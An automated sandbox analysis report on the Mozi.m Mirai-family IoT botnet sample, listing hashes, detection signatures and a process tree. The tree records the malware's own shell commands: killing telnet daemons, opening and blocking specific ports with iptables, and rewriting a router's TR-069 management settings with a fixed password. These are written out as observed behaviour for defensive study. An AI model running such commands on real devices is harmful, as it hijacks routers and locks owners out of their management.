
Analysis Report Mozi.m

Overview

General Information

Sample Name: Mozi.m
Analysis ID: 294799
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "mkdir" command used to create folders
Executes the "mktemp" command used to create a temporary unique file name
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • dash New Fork (PID: 3191, Parent: 3190)
  • sed (PID: 3191, Parent: 3190, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3192, Parent: 3190)
  • sort (PID: 3192, Parent: 3190, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3193, Parent: 2523)
  • sleep (PID: 3193, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3219, Parent: 3218)
  • sed (PID: 3219, Parent: 3218, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3220, Parent: 3218)
  • sort (PID: 3220, Parent: 3218, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3225, Parent: 2523)
  • sleep (PID: 3225, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3247, Parent: 3246)
  • sed (PID: 3247, Parent: 3246, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3248, Parent: 3246)
  • sort (PID: 3248, Parent: 3246, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3249, Parent: 2523)
  • sleep (PID: 3249, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3275, Parent: 3274)
  • sed (PID: 3275, Parent: 3274, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3276, Parent: 3274)
  • sort (PID: 3276, Parent: 3274, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3280, Parent: 2523)
  • sleep (PID: 3280, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3303, Parent: 3302)
  • sed (PID: 3303, Parent: 3302, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3304, Parent: 3302)
  • sort (PID: 3304, Parent: 3302, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3305, Parent: 2523)
  • sleep (PID: 3305, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3331, Parent: 3330)
  • sed (PID: 3331, Parent: 3330, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3332, Parent: 3330)
  • sort (PID: 3332, Parent: 3330, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3333, Parent: 2523)
  • sleep (PID: 3333, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3359, Parent: 3358)
  • sed (PID: 3359, Parent: 3358, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3360, Parent: 3358)
  • sort (PID: 3360, Parent: 3358, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3369, Parent: 2523)
  • sleep (PID: 3369, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3387, Parent: 3386)
  • sed (PID: 3387, Parent: 3386, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3388, Parent: 3386)
  • sort (PID: 3388, Parent: 3386, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3397, Parent: 2523)
  • sleep (PID: 3397, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3415, Parent: 3414)
  • sed (PID: 3415, Parent: 3414, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3416, Parent: 3414)
  • sort (PID: 3416, Parent: 3414, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3425, Parent: 2523)
  • sleep (PID: 3425, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3443, Parent: 3442)
  • sed (PID: 3443, Parent: 3442, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3444, Parent: 3442)
  • sort (PID: 3444, Parent: 3442, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3453, Parent: 2523)
  • sleep (PID: 3453, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • Mozi.m (PID: 3480, Parent: 3133, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 3490, Parent: 3480)
      • Mozi.m New Fork (PID: 3492, Parent: 3490)
        • Mozi.m New Fork (PID: 3494, Parent: 3492)
        • sh (PID: 3494, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 3496, Parent: 3494)
          • killall (PID: 3496, Parent: 3494, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 3513, Parent: 3492)
        • Mozi.m New Fork (PID: 3514, Parent: 3492)
        • Mozi.m New Fork (PID: 3515, Parent: 3492)
          • Mozi.m New Fork (PID: 3688, Parent: 3515)
          • sh (PID: 3688, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3690, Parent: 3688)
            • iptables (PID: 3690, Parent: 3688, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              • iptables New Fork (PID: 3691, Parent: 3690)
              • modprobe (PID: 3691, Parent: 3690, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 3722, Parent: 3515)
          • sh (PID: 3722, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3725, Parent: 3722)
            • iptables (PID: 3725, Parent: 3722, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3733, Parent: 3515)
          • sh (PID: 3733, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3739, Parent: 3733)
            • iptables (PID: 3739, Parent: 3733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3770, Parent: 3515)
          • sh (PID: 3770, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3772, Parent: 3770)
            • iptables (PID: 3772, Parent: 3770, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3776, Parent: 3515)
          • sh (PID: 3776, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
            • sh New Fork (PID: 3783, Parent: 3776)
            • iptables (PID: 3783, Parent: 3776, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3803, Parent: 3515)
          • sh (PID: 3803, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
            • sh New Fork (PID: 3808, Parent: 3803)
            • iptables (PID: 3808, Parent: 3803, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3811, Parent: 3515)
          • sh (PID: 3811, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
            • sh New Fork (PID: 3813, Parent: 3811)
            • iptables (PID: 3813, Parent: 3811, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3815, Parent: 3515)
          • sh (PID: 3815, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
            • sh New Fork (PID: 3822, Parent: 3815)
            • iptables (PID: 3822, Parent: 3815, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
        • Mozi.m New Fork (PID: 3678, Parent: 3492)
        • Mozi.m New Fork (PID: 3684, Parent: 3492)
        • Mozi.m New Fork (PID: 3686, Parent: 3492)
        • Mozi.m New Fork (PID: 4027, Parent: 3492)
        • sh (PID: 4027, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4029, Parent: 4027)
          • iptables (PID: 4029, Parent: 4027, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4030, Parent: 3492)
        • sh (PID: 4030, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4032, Parent: 4030)
          • iptables (PID: 4032, Parent: 4030, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4033, Parent: 3492)
        • sh (PID: 4033, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4036, Parent: 4033)
          • iptables (PID: 4036, Parent: 4033, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4044, Parent: 3492)
        • sh (PID: 4044, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4055, Parent: 4044)
          • iptables (PID: 4055, Parent: 4044, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4076, Parent: 3492)
        • sh (PID: 4076, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4087, Parent: 3492)
        • sh (PID: 4087, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4100, Parent: 3492)
        • sh (PID: 4100, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4107, Parent: 4100)
          • iptables (PID: 4107, Parent: 4100, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4127, Parent: 3492)
        • sh (PID: 4127, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4137, Parent: 4127)
          • iptables (PID: 4137, Parent: 4127, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 4154, Parent: 3492)
        • sh (PID: 4154, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4162, Parent: 4154)
          • iptables (PID: 4162, Parent: 4154, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 4175, Parent: 3492)
        • sh (PID: 4175, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4180, Parent: 4175)
          • iptables (PID: 4180, Parent: 4175, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4192, Parent: 3492)
        • sh (PID: 4192, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4199, Parent: 4192)
          • iptables (PID: 4199, Parent: 4192, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 4207, Parent: 3492)
        • sh (PID: 4207, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 4216, Parent: 4207)
          • iptables (PID: 4216, Parent: 4207, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 4235, Parent: 3492)
        • sh (PID: 4235, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 4239, Parent: 4235)
          • iptables (PID: 4239, Parent: 4235, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 4241, Parent: 3492)
        • sh (PID: 4241, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 4251, Parent: 4241)
          • iptables (PID: 4251, Parent: 4241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 4269, Parent: 3492)
        • sh (PID: 4269, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 4275, Parent: 4269)
          • iptables (PID: 4275, Parent: 4269, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 4279, Parent: 3492)
        • sh (PID: 4279, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 4285, Parent: 4279)
          • iptables (PID: 4285, Parent: 4279, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 4303, Parent: 3492)
        • sh (PID: 4303, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 4314, Parent: 4303)
          • iptables (PID: 4314, Parent: 4303, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 4321, Parent: 3492)
        • sh (PID: 4321, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 4328, Parent: 4321)
          • iptables (PID: 4328, Parent: 4321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 4351, Parent: 3492)
        • sh (PID: 4351, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4353, Parent: 4351)
          • iptables (PID: 4353, Parent: 4351, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4357, Parent: 3492)
        • sh (PID: 4357, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4364, Parent: 4357)
          • iptables (PID: 4364, Parent: 4357, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4386, Parent: 3492)
        • sh (PID: 4386, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4390, Parent: 4386)
          • iptables (PID: 4390, Parent: 4386, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4397, Parent: 3492)
        • sh (PID: 4397, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4408, Parent: 4397)
          • iptables (PID: 4408, Parent: 4397, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4426, Parent: 3492)
        • sh (PID: 4426, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
          • sh New Fork (PID: 4429, Parent: 4426)
          • iptables (PID: 4429, Parent: 4426, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4433, Parent: 3492)
        • sh (PID: 4433, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
          • sh New Fork (PID: 4440, Parent: 4433)
          • iptables (PID: 4440, Parent: 4433, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4462, Parent: 3492)
        • sh (PID: 4462, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
          • sh New Fork (PID: 4467, Parent: 4462)
          • iptables (PID: 4467, Parent: 4462, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4471, Parent: 3492)
        • sh (PID: 4471, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
          • sh New Fork (PID: 4478, Parent: 4471)
          • iptables (PID: 4478, Parent: 4471, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
  • dash New Fork (PID: 3520, Parent: 3519)
  • sed (PID: 3520, Parent: 3519, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3521, Parent: 3519)
  • sort (PID: 3521, Parent: 3519, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3534, Parent: 2523)
  • sleep (PID: 3534, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3548, Parent: 3547)
  • sed (PID: 3548, Parent: 3547, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3549, Parent: 3547)
  • sort (PID: 3549, Parent: 3547, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3558, Parent: 2523)
  • sleep (PID: 3558, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3576, Parent: 3575)
  • sed (PID: 3576, Parent: 3575, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3577, Parent: 3575)
  • sort (PID: 3577, Parent: 3575, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3586, Parent: 2523)
  • sleep (PID: 3586, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3604, Parent: 3603)
  • sed (PID: 3604, Parent: 3603, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3605, Parent: 3603)
  • sort (PID: 3605, Parent: 3603, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3614, Parent: 2523)
  • sleep (PID: 3614, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3631, Parent: 2523)
  • sed (PID: 3631, Parent: 2523, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DOMAINS=/ { s/^.*=/search /; p}" /run/systemd/netif/state
  • dash New Fork (PID: 3632, Parent: 2523)
  • resolvconf (PID: 3632, Parent: 2523, MD5: 4e4ff2bfda7a6d18405a462937b63a2e) Arguments: /bin/sh /sbin/resolvconf -a networkd
    • mkdir (PID: 3646, Parent: 3632, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /run/resolvconf/interface
    • resolvconf New Fork (PID: 3651, Parent: 3632)
      • sed (PID: 3652, Parent: 3651, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -e s/#.*$// -e s/[[:blank:]]\\+$// -e s/^[[:blank:]]\\+// -e "s/[[:blank:]]\\+/ /g" -e "/^nameserver/!b ENDOFCYCLE" -e "s/$/ /" -e "s/\\([:. ]\\)0\\+/\\10/g" -e "s/\\([:. ]\\)0\\([123456789abcdefABCDEF][[:xdigit:]]*\\)/\\1\\2/g" -e "/::/b ENDOFCYCLE; s/ \\(0[: ]\\)\\+/ ::/" -e "/::/b ENDOFCYCLE; s/:\\(0[: ]\\)\\+/::/" -e ": ENDOFCYCLE" -
      • sed (PID: 3653, Parent: 3651, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -e s/[[:blank:]]\\+$// -e /^$/d
  • dash New Fork (PID: 3865, Parent: 2079)
  • mkdir (PID: 3865, Parent: 2079, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /home/user/.cache/logrotate
  • dash New Fork (PID: 3874, Parent: 2079)
  • mkdir (PID: 3874, Parent: 2079, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /home/user/.cache/upstart
  • dash New Fork (PID: 3875, Parent: 2079)
  • egrep (PID: 3875, Parent: 2079, MD5: ef55d1537377114cc24cdc398fbdd930) Arguments: /bin/sh /bin/egrep [^[:print:]] /home/user/.cache/logrotate/status
  • grep (PID: 3875, Parent: 2079, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E [^[:print:]] /home/user/.cache/logrotate/status
  • dash New Fork (PID: 3928, Parent: 2079)
  • mktemp (PID: 3928, Parent: 2079, MD5: 91cf2e2a84f3b49fdecdd8b631902009) Arguments: mktemp
  • dash New Fork (PID: 3937, Parent: 2079)
  • cat (PID: 3937, Parent: 2079, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat
  • dash New Fork (PID: 3938, Parent: 2079)
  • logrotate (PID: 3938, Parent: 2079, MD5: d0eaf9942936032d217478b93e9cd4b1) Arguments: logrotate -s /home/user/.cache/logrotate/status /tmp/tmp.vHWsTctARt
    • gzip (PID: 3939, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3950, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3973, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3974, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3975, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
